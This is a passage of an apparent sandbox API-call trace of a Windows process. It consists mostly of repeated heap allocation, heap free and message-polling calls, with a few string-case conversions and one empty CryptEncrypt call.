wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0248.298] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.298] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.299] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0248.299] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0248.299] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.299] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0248.299] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.299] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0248.300] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.300] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.300] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0248.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0248.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0248.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0248.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0248.300] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0248.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0248.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0248.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0248.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0248.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0248.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0248.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0248.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0248.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0248.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0248.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0248.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0248.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0248.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0248.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0248.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0248.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0248.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0248.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0248.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0248.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0248.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0248.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0248.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0248.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0248.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0248.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0248.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0248.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0248.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0248.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0248.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0248.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0248.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0248.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0248.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0248.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0248.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0248.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0248.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0248.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0248.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0248.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0248.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0248.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0248.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0248.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0248.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0248.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0248.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0248.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0248.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0248.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0248.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0248.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0248.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0248.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0248.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0248.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0248.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0248.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0248.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0248.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0248.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0248.314] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0248.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0248.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0248.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 